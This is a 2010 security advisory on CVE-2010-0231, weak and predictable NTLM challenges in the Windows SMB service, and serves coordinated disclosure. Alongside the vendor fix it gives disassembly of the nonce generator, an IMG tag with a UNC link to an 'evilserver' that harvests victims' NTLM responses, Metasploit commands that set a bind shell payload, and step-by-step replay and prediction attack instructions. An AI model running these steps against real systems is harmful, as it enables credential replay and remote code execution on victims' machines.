Windows SMB NTLM Authentication Weak Nonce Vulnerability

(to get the scripts mentioned by this advisory please get the full

not include them here to reduce the size of this email)

                Windows SMB NTLM Authentication Weak Nonce Vulnerability

                                Security Advisory

        Hernan Ochoa (hernan () gmail com) - Agustin Azubel (agustin.azubel () gmail com)

Title: Windows SMB NTLM Authentication Weak Nonce Vulnerablity

Advisory ID: OCHOA-2010-0209

Date published: 2010-02-09

Vendors contacted: Microsoft

Release mode: Coordinated release

Last Updated: 2010-02-09

Index

-----

1.Vulnerablity information

2.Vulnerablity description

3.Vulnerable systems

4.Vendor Information, solutions and workarounds

5.Credits

6.Technical description

6.1.NTLMv1 authentication protocol

6.2.The Flaws

6.3.Detecting if the SMB service generates duplicate 8-byte challenges

6.4.Exploiting duplicate challenges

6.4.1.Proof-of-Concept Exploit

6.5.Predicting challenges

6.5.1.SMB service: challenge generation process

6.5.2.Proof-of-Concept Exploit

7.References

8.Disclaimer

1.Vulnerability information

---------------------------

Impact: An unauthenticated remote attacker without any kind of

credentials can access the SMB service under the credentials of an

authorized user. Depending on the privileges of the authorized user, and

the configuration of the remote system, an attacker can gain read/write

access to the remote file system and execute arbitrary code by using

DCE/RPC over SMB.

Remotely Exploitable: Yes

Bugtraq Id: <unknown>

CVE: CVE-2010-0231

2.Vulnerability description

Microsoft Server Message Block (SMB) Protocol is a Microsoft network

file sharing protocol also used for sharing printers, communications

abstractions such as named pipes and mailslots, and performing Remote

Procedure Calls (DCE/RPC over SMB) [1].

NTLM (NT Lan Manager) is a challenge-response authentication protocol

used by the SMB protocol [2].

Windows systems commonly use the SMB protocol with NTLM authentication

for network file/printer sharing and remote administration via DCE/RPC.

Flaws in Microsoft's implementation of the NTLM challenge-response

authentication protocol causing the server to generate duplicate

challenges/nonces and an information leak allow an unauthenticated

remote attacker without any kind of credentials to access the SMB

service of the target system under the credentials of an authorized

user. Depending on the privileges of the user, the attacker will be able

to obtain and modify files on the target system and execute arbitrary code.

3.Vulnerable Systems

--------------------

This vulnerability was verified by the authors on the following platforms:

Windows NT4 SP1

Windows Server 2003 SP2

Windows XP SP3

Windows Vista x32

Windows 7 x32 RC

However, all versions of Windows implementing NTLMv1 are suspected to be

affected.

Microsoft, in their "Microsoft Security Bulletin Advance Notification

for February 2010" [3], list the following platforms as affected:

Windows 2000 SP4

Windows XP SP2 and SP3

Windows XP Professional x64 Edition SP2

Windows Server 2003 x64 Edition SP2

Windows Server 2003 SP2 for Itanium-based systems

Windows Vista

Windows Vista SP1

Windows Vista SP2

Windows Vista x64 Edition

Windows Vista x64 Edition SP1

Windows Vista x64 Edition SP2

Windows Server 2008 x32

Windows Server 2008 x32 SP2

Windows Server 2008 x64 SP2

Windows Server 2008 for Itanium-based systems

Windows Server 2008 for Itanium-based systems SP2

Windows 7 x32

See [3] for more details.

Given that Windows NT 4 was relased in ~1996 this vulnerability has been

present for ~14 years. If it is confirmed this vulnerablity is also

present in older systems such as Windows NT 3.1, released in ~1993,

Windows NTLMv1 authentication mechanism could have been vulnerable for

~17+ years.

4.Vendor Information, Solutions and Workarounds

-----------------------------------------------

SMB NTLM Authentication Lack of Entropy Vulnerability - CVE-2010-0231

<a href="http://www.microsoft.com/technet/security/bulletin/ms10-012.mspx">http://www.microsoft.com/technet/security/bulletin/ms10-012.mspx</a>

---------

This vulnerability was discovered by Hernan Ochoa (Independent

Information Security Consultant and Researcher) and it was researched by

Hernan Ochoa and Agustin Azubel (Independent Information Security

Consultant and Researcher).

------------------------

----------------------------------

The NTLMv1 authentication protocol is a challenge-response protocol that

consists of the following messages:

        1. The client sends to the server a message containing a set of flags of

features supported/requested to perform authentication.

        2. The server responds with a message containing a set of flags

supported/required by the server enabling both ends to agree on the

authentication parameters and, more importantly, an 8-byte random

challenge/nonce.

        3. The client uses the random challenge/nonce and the user's

credentials to calculate the response (24 bytes) and sends it to the server.

        4. The server determines if the response is correct and allows or

disallows access to the client.

The randomness of the 8-byte challenge/nonce returned by the server

tries to ensure that every challenge-response sequence is unique helping

protect against replay attacks.

----------------

Several flaws were found leading to attacks such as generation of

duplicate challenges/nonces and challenge/nonce prediction.

The randomness of the 8-byte challenges generated by the SMB server in

response to an specific packet requesting authentication is bad enabling

attackers to perform replay attacks. The SMB server easily generates

duplicate 8-byte challenges.

The challenge/nonce prediction attack is feasible due to several factors

including that the protocol leaks information that can be used by an

attacker to calculate the internal state of the PRNG used to generate

challenges.

-----------------------------------------------------------------------

Detecting the generation of duplicate challenges can be verified

remotely by repeatedly sending 'SMB Negotiate Protocol Request' packets

to a Windows system with the 'Flags2' field set to 0xc001 (disabling

security signatures, extended attributes and extended security

negotiation) recording the 8-byte challenges obtained from the server

and waiting for duplicates.

The following Ruby script can be used to test for the presence of this

vulnerability:

&lt;test2_ochoa_2010-0209.rb&gt;

--------------------------------------

There are different ways to exploit duplicate challenges, including:

        (i) An attacker A can eavesdrop network traffic looking for NTLM

authentication messages exchanged between client C and server S ('SMB

Negotiate Protocol Requests' packets and 'SMB Negotiate Protocol

Responses' packets), storing challenges and their corresponding

responses. The attacker A can then perform several authentication

requests to server S until S returns a previously observed challenge (a

duplicate).At that point attacker A will send the corresponding and

previously recorded response.

        We did not find so far any current Windows version (XP,Vista,7,etc)

that by default or using some specific configuration, when acting as an

SMB client, would generate the necessary 'SMB Negotiate Protocol

Request' packets with the correct values in the 'Flags2' field to

trigger the vulnerability when accessing a remote SMB service. Hence we

were unable to collect duplicate challenges only by network sniffing.

        Tests were performed with the third-party SMB client 'smbclient' from

the SAMBA project with the same negative results (tests were not

exhaustive).

        Since this problem was also found on Windows versions as old as Windows

NT4, this scenario might still be possible.

        (ii) An attacker A connects to system S and sends mutiple 'SMB

Negotiate Protocol Request' packets with the 'Flags2' field set to

0xc001 to obtain several challenges, and stores them. The attacker A

then forces a user U on system S to connect to his own specially crafted

SMB server, for example by sending an email with multiple &lt;IMG&gt; tags

with UNC links (e.g.: &lt;IMG SRC=//evilserver/share/a.jpg&gt;) or a link to

web server with similar &lt;IMG&gt; tags. Upon receiving the connections from

system S,the attacker's SMB server will respond with the previously

obtained challenges and will store the corresponding responses returned

by the remote system. Attacker A has now a set of responses which are

the challenges encrypted with user's U credentials.

        Finally, the attacker A will perform several authentication requests to

system S until it returns one of the challenges obtained at the

beginning of this attack, and at that point he will replay the

corresponding and previously obtained response to gain access to system

S as user U.

        If user U has, for example, local administrator privileges on system S

(not uncommon for Windows XP users, for example), remote code execution

is possible via DCE/RPC over SMB. Even if user U has no administrator

privileges attacker A can still access, for example, file shares

accessible by user U and read/modify information.

        Tests performed showed that challenges and responses obtained from a

system S can be reused multiple times against that same system and other

remote systems. We observed that challenges obtained from a system S

were also returned by other remote systems. This means that attacker A

only needs, in the best case scenario, to force user U to connect to his

own specially crafted SMB server once. Of course, user U must have

access (his credentials must be valid) to the other systems attacked.

        This attack needs the victim to have port 445/tcp open and the attacker

to be able to access that port. The victim also needs to be able to

access port 445/tcp on the attacker's server (only once, to record

responses. Subsequent attacks do not need the victim to access the

attacker's system).

        This simple attack using a 'brute-force' approach to find duplicate

challenges proved to be acceptably effective.

--------------------------------

The exploit implementation is twofolded:

        (i) setup_smb_weak_nonce.rb    

                This standalone Ruby script performs several connections to the victim

sending 'SMB Negotiate Protocol Request' packets to obtain 8000

challenges (the number of challenges to be obtained can be changed).

                After collecting 8000 challenges, it will listen on port 445/tcp for

incoming SMB connections originated by the victim. For every connection

received, it will send to the victim one of the previously obtained

challenges and will store the corresponding response obtained.

                As a simple example of a method to force the victim to connect to the

attacker, the file 'conn.html' is provided. This is a very simple HTML

file with javascript code that will generate 1000 &lt;IMG&gt; tags with an UNC

link to different image files.

                The challenges and responses obtained are saved to the file

'fullcreds.log'.

        (ii)  msf_smb_weak_nonce.rb

                This metasploit module will perform connections to the victim until

the server responds with one of the duplicate challenges stored in

'fullcreds.log'. The module will then send the corresponding response to

gain access to the victim's SMB service.

                Finally, after successful exploitation, the module will create the

file 'owned.txt' in the ADMIN$ share (c:/windows) with the following

text: "Windows SMB NTLM Authentication weak nonce vulnerability

successfully exploited!".

                This module can be easily modified to execute code on the remote

system (given the target user has enough privileges).

To exploit the vulnerability repeat the following steps:

                1. copy msf_smb_weak_nonce.rb to

&lt;METASPLOIT_DIR&gt;/modules/exploits/windows/smb

                2. Run setup_smb_weak_nonce.rb specifying the IP of the victim (e.g.:

ruby setup_smb_weak_nonce.rb 192.168.10.1). After collecting the nonces

the script will listen on port 445 for incoming SMB connections.

                3. Run Internet Explorer and load 'conn.html'. This will produce 1000+

connections to the SMB server implemented by setup_smb_weak_noce.rb.

                (Note 1: setup_smb_weak_nonce.rb needs to be run as root to be able to

listen on port 445/tcp)

                (Note 2: If you load 'conn.html' with Internet Explorer and

'conn.html' is stored on a local drive (e.g.:c:/conn.html) it is

possible Internet Explorer will prompt you to allow execution of the

javascript code within 'conn.html'. This is not a limitation of the

attack, it is just an extra protection implemented by Internet Explorer,

the 'conn.html' does not even need to contain javascript code, it uses

it just because it is convenient, you could just as easily 'hard-code'

all &lt;IMG&gt; tags. Also, loading the html file from the a local disk is not

a real attack scenario, all of this is for demonstration purposes).

                4.After 1000 connections are received by setup_smb_weak_nonce.rb the

script will terminate. The file 'fullcreds.log' will be generated. Copy

'fullcreds.log' to /tmp.

                5. run metasploit (msfconsole) and execute the following commands:

                -use windows/smb/msf_smb_weak_nonce

                -set RHOST &lt;victim_ip&gt;

                        for example: set RHOST 192.168.10.1

                -set payload windows/shell/bind_tcp

                -exploit

                The metasploit module looks for 'fullcreds.log' in '/tmp' by default.

You can specify the location of the 'fullcreds.log' file using the

following command:

                -set CREDSFILE &lt;path+filename&gt;

                for example:

                        -set CREDSFILE /mydir/fullcreds.log

                6.the metasploit module will start performing connections to the

victim until receiving a duplicate challenge for which there's a

response in the 'fullcreds.log' file. After successfully authenticating

to the victim, the script will create the file 'owned.txt' in c:/windows

via the ADMIN$ share (given the user exploited has enough privileges).

                Please remember that this proof-of-concept exploit requires the targer

user to have enough privileges (e.g.: local administrator) to access the

ADMIN$ share remotely. However, the target user does need to have this

privilege level in order for the attacker to exploit the vulnerability.

For example: if the target user only has regular user privileges, an

attacker can access the file shares that user has access to. Also,

exploiting the vulnerabiliy and the level of access obtained are two

different things.

                This is just a proof-of-concept exploit, it can be improved and optimized.

Next are all the previously mentioned files part of the proof-of-concept

exploit:

&lt;setup_smb_weak_nonce.rb&gt;

&lt;msf_smb_weak_nonce.rb&gt;

&lt;conn.html&gt;

        The challenge/nonce prediction attack is feasible due to several

factors including that the protocol leaks information that can be used

by an attacker to calculate the internal state of the PRNG used to

generate challenges.

        In order to explain the attack implemented next we begin by explaining

the method used by the Windows SMB service to generate challenges.

        (Note: during this explanation we are going to use the code for the

Windows XP version of all modules mentioned. The code is the same in all

platforms with some minor differences for some platforms but these

differences do not produce a different behaviour).

        The function that generates the challenges returned in 'SMB Negotiate

Protocol Response' packets is srv.sys!GetEncryptionKey():

        It takes the current time, and adds to the low part of the current time

the value of the

        global variable _EncryptionKeyCount.

        00040735                 lea     eax, [ebp+CurrentTime]

        00040738                 push    eax

        00040739                 call    ds:__imp__KeQuerySystemTime () 4

        0004073F                 mov     eax, _EncryptionKeyCount

        00040744                 add     dword ptr [ebp+CurrentTime], eax

        Increments _EncryptionKeyCount by 0x100 and makes some 'calculations'

        with the (current time.lowpart + _EncryptionKeyCount) resulting in a

DWORD value with the

        following 'pattern':

                        where CT = (current time.lowpart + _EncryptionKeyCount)

                                seed = CT[1], CT[2]-1, CT[2], CT[1]+1;

        00040747                 movzx   ecx, byte ptr [ebp+CurrentTime+1]

        0004074B                 movzx   eax, byte ptr [ebp+CurrentTime+2]

        0004074F                 add     _EncryptionKeyCount, 100h

        00040759                 mov     edx, ecx

        0004075B                 shl     edx, 8

        0004075E                 lea     esi, [eax-1]

        00040761                 or      edx, esi

        00040763                 mov     esi, ds:__imp__RtlRandom () 4

        00040769                 shl     edx, 8

        0004076C                 or      edx, eax

        0004076E                 shl     edx, 8

        00040771                 inc     ecx

        00040772                 lea     eax, [ebp+Seed]

        00040775                 or      edx, ecx

        Then it calls the ntoskrnl.exe!RtlRandom(&amp;seed) function three times, using

        as a 'seed' the value with the pattern shown above. Each call to

ntosrnkl.exe!RtlRandom(&amp;seed)

        returns in 'seed' a different value (meaning each call does not use the

same value as a 'seed').

        00040777                 push    eax

        00040778                 mov     [ebp+Seed], edx

        0004077B                 call    esi ; RtlRandom(x)

        0004077D                 mov     [ebp+var_18], eax

        00040780                 lea     eax, [ebp+Seed]

        00040783                 push    eax

        00040784                 call    esi                            ; RtlRandom(x)

        00040786                 mov     ebx, eax

        00040788                 lea     eax, [ebp+Seed]

        0004078B                 push    eax                           ; Seed

        0004078C                 call    esi                           ; RtlRandom(x)

        The calls to ntoskrnl.exe!RtlRandom(&amp;seed) generate 3 'random' numbers.

        Based on the value of random_number3, random_number1 and random_number2 are

        modified:

        0004078E                 test    al, 1

        00040790                 mov     ecx, 80000000h

        00040795                 jz      short loc_4079A

        00040797                 or      [ebp+var_18], ecx

        0004079A

        0004079A loc_4079A:

        0004079A                 test    al, 2

        0004079C                 jz      short loc_407A0

        0004079E                 or      ebx, ecx

        000407A0

        000407A0 loc_407A0:

        Finally, the code returns the challenge in the form

bytes(random_number1, random_number2)

        000407A0                 mov     eax, [ebp+var_18]

        000407A3                 mov     ecx, [ebp+var_4]

        000407A6                 mov     [edi+4], ebx

        000407A9                 mov     [edi], eax

        000407AB                 pop     edi

        000407AC                 pop     esi

        000407AD                 pop     ebx

        000407AE                 call    @__security_check_cookie () 4

        000407B3                 leave

        000407B4                 retn    4

        Next is pseudo-code for the function srv.sys!GetEncryptionKey():

        // Global Variable

        DWORD _EncryptionKeyCount = 0;

        srv.sys!GetEncryptionKey(byte OUT *pChallenge)

        {

        LARGE_INTEGER currentTime;

        DWORD seed;

        DWORD random_number1, random_number2, random_number3;

                KeQuerySystemTime(&amp;CurrentTime);

                CurrentTime.LowPart += _EncryptionKeyCount;

                _EncryptionKeyCount += 0x100;

                CT = CurrentTime.LowPart;

                seed = CT[1], CT[2]-1, CT[2], CT[1]+1;

                random_number1 = ntoskrnl.exe!RtlRandom(&amp;seed);

                random_number2 = ntoskrnl.exe!RtlRnadom(&amp;seed);

                random_number3 = ntoskrnl.exe!RtlRandom(&amp;seed);

                if ( (random_number3 &amp; 1) == 1) {

                        random_number1 |= 0x80000000

                }

                if( (random_number3 &amp; 2) == 2 ) {

                        random_number2 |=  0x80000000

                *pChallenge =  bytes(random_number1, random_number2);

        }

        The code for ntoskrnl.exe!RtlRandom(&amp;seed) is the following:

        It receives the seed and performs the following calculations:

                X0 = *seed;

                X1 = (a*X0 + b ) mod m

                where:

                        a = 0x7FFFFFED

                        b = 0x7FFFFFC3

                        m = 0x7FFFFFFF

        004B5B75                 mov     edi, edi

        004B5B77                 push    ebp

        004B5B78                 mov     ebp, esp

        004B5B7A                 push    ebx

        004B5B7B                 push    esi

        004B5B7C                 mov     esi, [ebp+Seed]

        004B5B7F                 mov     eax, [esi]

        004B5B81                 imul    eax, 7FFFFFEDh

        004B5B87                 push    edi

        004B5B88                 mov     ecx, 7FFFFFC3h

        004B5B8D                 add     eax, ecx

        004B5B8F                 mov     edi, 7FFFFFFFh

        004B5B94                 xor     edx, edx

        004B5B96                 mov     ebx, edi

        004B5B98                 div     ebx

                With the X1 value performs similar calculations:

                X2 = (a*X1 + b) mod m

        004B5B9A                 mov     ebx, edx

        004B5B9C                 mov     eax, edx

        004B5B9E                 imul    eax, 7FFFFFEDh

        004B5BA4                 add     eax, ecx

        004B5BA6                 xor     edx, edx

        004B5BA8                 div     edi

        It sets the value of seed to X2

        004B5BAA                 pop     edi

        004B5BAB                 mov     [esi], edx

        it calculates  (X2 &amp; 0x7F) to generate an index for the

_RtlpRandomConstantVector

        004B5BAD                 and     edx, 7Fh

        004B5BB0                 lea     ecx, _RtlpRandomConstantVector[edx*4]

        and finally fetches the value found at the previously calculated index,

and also

        stores the value of X1 in that position.

        004B5BB7                 mov     eax, [ecx]

        004B5BB9                 pop     esi

        004B5BBA                 mov     [ecx], ebx

        Next is pseudo-code for the function ntoskrnl.exe!RtlRandom:

        // Global variable

        DWORD ntoskrnl.exe!RtlpRandomConstantVector [128] = {...}

        DWORD ntoskrnl.exe!RtlRandom(DWORD *pseed)

        DWORD a = 0x7FFFFFED;

        DWORD b = 0x7FFFFFC3;

        DWORD m = 0x7FFFFFFF;

        DWORD X0, X1, X2;

                X0 = *pseed;

                X1 = ( a*X0 + b ) mod m

                X2 = ( a*X1 + b ) mod m

                *pseed = X2;

                ndx = X2 &amp; 0x7F;

                n = RtlpRandomConstantVector[ndx];

                RtlpRandomConstantVector[ndx] = X1;

                return n;

        In Summary,

        The srv.sys!GetEncryptionKey() does the following:

                - Gets current time, takes the low part (4 bytes) and adds the value

of _EncryptionKeyCount (4-bytes)

                - Increments _EncryptionKeyCount by 0x100

                - Takes the two 'middle' bytes of CT=(current time.lowpart +

_EncryptionKeyCount) and creates

a seed with the form CT[1], CT[2]-1, CT[2], CT[1]+1.

                -  Calls ntoskrnl.exe!RtlRandom three times and obtains three random

numbers (random1,random2,random3)

                -  Depending on the value of random3, makes some modifications to

random1 and random2

                -  creates the challenge by creating an array of bytes in the form

random1, random2

        The ntoskrnl.exe!RtlRandom function appears to be a Maclaren-Marsaglia

PRNG algorithm using two LCGs (linear congruential generators) [4] with

a vector of 128 bytes.

                We know the following facts:

                        - _EncryptionKeyCount starts with a value of 0

                        - _EncryptionKeyCount is only modified by srv.sys!GetEncryptionKey.

The code that calls srv.sys!GetEncryptionKey() is not regularly

triggered, but only when the SMB service receives a packet like the one

we use with the 'flags2' field set to 0xc001

                        - We have not observed 'modern' Windows systems (Windows XP SP3,

Vista, 7, etc) generate these kind of packets

                        - This allows us to expect that before start conducting an attack

against any 'modern' Windows system, _EncryptionKeyCount will always be

0; by keeping count of the number of packets we send, we can also

calculate the value of _EncryptionKeyCount for further connections

                        - Interestingly enough, in our tests, the value of Current Time used

by srv.sys!GetEncryptionKey to generate the seed was the same value

returned by the SMB service to the client in the field 'System Time' of

an 'SMB Negotiate Protocol Response' packet

                        - The initial state of the vector used by ntoskrnl.exe!RtlRandom is

hard-coded, but it is modified every time the function is called and it

is called every time a new process is created (modifications might not

be that many).

                Based on these facts we implemented the following attack to predict

challenges:

                - We set the vector used by ntoskrnl.exe!RtlRandom to a 'known state'

                        -To do this we send multiple 'SMB Negotiate Protocol Request' packets

with the 'flags2' field set to 0xc001 to trigger

srv.sys!GetEncryptionKey which in turns calls ntoskrnl.exe!RtlRandom

modifying its internal vector (~300 packets)

                        -Since we know the seed used by the server to perform the previous

actions, because it is in the 'System Time' field of the 'SMB Negotiate

Protocol Response' packet we receive, and we also know all the other

variables including the value of _EncryptionKeyCount, we can do the same

calculations updating our own vector

                        -We repeat this process until all 128 values of our vector are

calculated. At this point we know the state of the table on the remote

system, we know all of its values and their position within the vector.

                - We calculate all possible challenges that can be generated with that

'known state' next time srv.sys!GetEncryptionKey is called

                - We force the victim to connect to our specially crafted SMB server

to get all those challenges encrypted with the credentials of the victim

(an average of ~16000 to ~48000 possible challenges)

                - At this point we know that if we send another authentication request

to the victim the challenge returned will be one of the pre-calculated

challenges. We make the connection, get the challenge, look for the

corresponding response we obtained from the victim, and authenticate to

the SMB service.

------------------------------

Next are the necessary steps to perform the attack:

                - Run predictor.rb against the victim. E.g.: ruby predictor.rb

192.168.1.110

                This script will show the progress of 'setting' the values of the

victims RtlRandom's internal vector.

                It will display something like this:

                (0x00-0x04) 0x00000000 0x00000000 0x00000000 0x2948d15b

                (0x04-0x08) 0x72f4dda5 0x00000000 0x14dbf86f 0x00000000

                (0x08-0x0c) 0x00000000 0x62d2c31e 0x00000000 0x7ef9db03

                (0x0c-0x10) 0x00000000 0x0dfdee4d 0x00000000 0x0ecd0d97

                (0x10-0x14) 0x00000000 0x04d986e1 0x00000000 0x00000000

                (0x14-0x18) 0x00000000 0x35fdf275 0x00000000 0x00000000

                (0x18-0x1c) 0x00000000 0x47b6b289 0x00000000 0x00000000

                (0x1c-0x20) 0x5b9a7eb8 0x00000000 0x00000000 0x3b150ecc

                (0x20-0x24) 0x146909b1 0x7a3022b1 0x00000000 0x00000000

                (0x24-0x28) 0x23bfb6e0 0x00000000 0x00000000 0x0e5c7c0f

                (0x28-0x2c) 0x3f027a59 0x00000000 0x00000000 0x00000000

                (0x2c-0x30) 0x00000000 0x00000000 0x6a3158d2 0x00000000

                (0x30-0x34) 0x69d97001 0x2cd5c5e6 0x00000000 0x2cdcb5b0

                (0x34-0x38) 0x00000000 0x00000000 0x00000000 0x00000000

                (0x38-0x3c) 0x00000000 0x00000000 0x00000000 0x00000000

                (0x3c-0x40) 0x08deca3d 0x4954003d 0x00000000 0x00f5b207

                (0x40-0x44) 0x4de0efd1 0x00000000 0x00000000 0x56bf3780

                (0x44-0x48) 0x25210c65 0x00000000 0x00000000 0x00000000

                (0x48-0x4c) 0x00000000 0x00000000 0x00000000 0x00000000

                (0x4c-0x50) 0x00000000 0x00000000 0x00000000 0x00000000

                (0x50-0x54) 0x00000000 0x397415a1 0x34aa91eb 0x00000000

                (0x54-0x58) 0x231aeb35 0x00000000 0x00000000 0x00000000

                (0x58-0x5c) 0x00000000 0x04223749 0x00000000 0x1b4c91f8

                (0x5c-0x60) 0x00000000 0x00000000 0x00000000 0x71ad9da7

                (0x60-0x64) 0x00000000 0x00000000 0x00000000 0x046696bb

                (0x64-0x68) 0x00000000 0x00000000 0x193b264f 0x439ef5b4

                (0x68-0x6c) 0x5bdd2f34 0x00000000 0x00000000 0x481eaee3

                (0x6c-0x70) 0x00000000 0x00000000 0x50b1e1f7 0x2a8d71dc

                (0x70-0x74) 0x00000000 0x02240f41 0x0ae7948b 0x37af3d8b

                (0x74-0x78) 0x00000000 0x00000000 0x77130a3a 0x640bf49f

                (0x78-0x7c) 0x31665169 0x20a1c769 0x00000000 0x00000000

                (0x7c-0x80) 0x6958e618 0x00000000 0x00000000 0x00000000

                known values: 48/128

        - When predictor.rb finishes, it writes the values of the vector to

'x_values.log' (it also generates a file 't_values.log' containing the

'current times' observed in the 'SMB Negotiate Protocol Response' packets).

        - Run generate_challenges.rb, it will generate the file

'challenges.log' with all the possible challenges based on 'x_values.log'.

        - Run savecreds.rb, it will wait for incoming connections on port 445/tcp

        - On the victim, use 'predict.html' with Internet Explorer to perform

SMB connections to savecreds.rb's server

        You will need to change the IP address of the server where savecreds.rb

is running in 'predict.html', and

        also the number of connections to perform (look for the line: 'if (id

== 50000) {' and change accordingly).

        The number of connections that need to be performed is shown by

savecreds.rb.

        - When savecreds.rb is finished, a file 'fullcreds.log' will be created

        - Now use the metasploit module msf_smb_weak_nonce.rb as explained

before with the recently generated 'fullcreds.log' against the victim

        - You should be able to authenticate with the victim at the ~first attempt

        Sometimes the challenge is correctly 'guessed' at the first attempt,

but the attack fails because of some SMB error. If this happens please

note that the challenge was indeed correctly predicted.

        Also note that since the internal vector is not completely modified

after just one connection, the exploit will actually be able to predict

more challenges (you might be able to run the metasploit exploit

multiple times before performing the whole attack all over again).

        The predictor.rb assumes the EncryptionKeyCount is 0. If you want to

run the attack multiple times you

        just need to modify its value in predictor.rb. The value of

EncryptionKeyCount after the attack is displayed by predictor.rb when it

terminates (you need to use the value displayed + 0x100).

        After generate_challenges.rb is executed, if the number of possible

challenges is 'too big' (~48000 or more) you

        might want to run predictor.rb again. The size of the set of possible

challenges vary according to the values in the vector. Remember to

adjust EncryptionKeyCount before running predictor.rb. We recommend

peforming the attack when EncryptionKeyCount is 0 specially if this is

the first time this proof-of-concept is used.

        This is just a proof-of-concept exploit, it can be improved and optimized.

&lt;savecreds.rb&gt;

&lt;predict.html&gt;

&lt;predictor.rb&gt;

&lt;generate_challenges.rb&gt;

------------

[1] Microsoft SMB Protocol and CIFS Protocol Overview

[2] Microsoft NTLM

[3] Microsoft Security Bulletin Advance Notification for February 2010

<a href="http://www.microsoft.com/technet/security/Bulletin/ms10-feb.mspx">http://www.microsoft.com/technet/security/Bulletin/ms10-feb.mspx</a>

[4] Bruce Schneier, Applied Cryptography (Second Edition), 1996.

Chapter 16, pp 369.

The contents of this advisory are copyright (c) 2010 Hernan Ochoa, and

may be distributed freely provided that no fee is charged for

distribution and proper credit is given.